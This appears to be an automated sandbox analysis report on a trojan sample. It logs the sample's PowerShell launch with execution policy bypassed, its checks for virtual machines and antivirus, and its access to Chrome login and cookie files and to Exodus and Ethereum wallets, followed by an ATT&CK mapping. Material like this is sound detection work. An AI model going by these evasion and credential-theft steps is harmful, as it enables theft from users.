                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804 | Thread sleep count: 4389 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804 | Thread sleep count: 4794 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5904 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4389
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4794
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi69FA.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI73EE.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI74BB.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI745C.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: powershell.exe, 00000005.00000003.488873845.000000000816D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
Source: powershell.exe, 00000005.00000003.403270333.000000000537A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000005.00000002.538775864.0000000007145000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.406446885.0000000007152000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: powershell.exe, 00000005.00000003.488873845.000000000816D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareUN6KW4MNWin32_VideoController3C_61XVCVideoController120060621000000.000000-000.075...7display.infMSBDA91A41U7OPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZNPXN4YCLMEMp
Source: powershell.exe, 00000005.00000003.403270333.000000000537A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-VlB
Source: powershell.exe, 00000005.00000003.488873845.000000000816D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareUN6KW4MNWin32_VideoController3C_61XVCVideoController120060621000000.000000-000.075...7display.infMSBDA91A41U7OPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZNPXN4YCc
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D66840 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CF27F0 ReadFile,FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCC9A0 FindFirstFileW,GetLastError,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CF3E10 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CreateFileW,SetFilePointer,SetEndOfFile,FindCloseChangeNotification,DeleteFileW,DeleteFileW,DeleteFileW,CloseHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCC040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCE270 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCC3D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D108C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CDAB40 FindFirstFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CFCDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00BD11B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CFD1D0 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CB1410 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File Volume queried: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CE1960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D9A0DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D9A11F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D8B5D7 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D7F9A7 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D850F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D7FABF GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00BEB0B0 __set_se_translator,SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D80536 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\helper company llc\helper 1.0.0\install\helper.msi" ai_setupexepath=c:\users\user\desktop\securiteinfo.com.win32.trojan-gen.16963.11783.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1692671532 "
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss77d9.ps1" -propfile "c:\users\user\appdata\local\temp\msi77c5.txt" -scriptfile "c:\users\user\appdata\local\temp\scr77d6.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr77d7.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCE790 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D80F72 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D0AC30 GetUserNameW,GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegCloseKey,RegDeleteValueW,RegCloseKey
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D0C2F0 CreateNamedPipeW,CreateFileW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00BB7480 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB Blob
Source: powershell.exe, 00000005.00000002.538775864.0000000007145000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.514940263.0000000008186000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.521530251.00000000009B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.516175434.0000000008197000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
Source: powershell.exe, 00000005.00000002.544193996.0000000008241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 00000005.00000002.543074516.000000000814C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets\*
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
Source: powershell.exe, 00000005.00000002.546026802.0000000008F20000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

                  Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; the number the report shows next to a technique is kept in parentheses)

Initial Access: Replication Through Removable Media (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain
Execution: Windows Management Instrumentation (221), Native API (1), Command and Scripting Interpreter (12), PowerShell (1), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Privilege Escalation: DLL Side-Loading (1), Process Injection (12), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Timestomp (1), DLL Side-Loading (1), File Deletion (1), Masquerading (21), Modify Registry (1), Virtualization/Sandbox Evasion (231), Process Injection (12), Right-to-Left Override, Rename System Utilities
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging
Discovery: System Time Discovery (1), Peripheral Device Discovery (11), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (117), Query Registry (1), Security Software Discovery (251), Process Discovery (1), Virtualization/Sandbox Evasion (231), Application Window Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1)
Lateral Movement: Replication Through Removable Media (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media, Component Object Model and Distributed COM
Collection: Archive Collected Data (1), Data from Local System (3), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (11), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Impact: Modify System Partition, Device Lockout, Delete Device Data, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
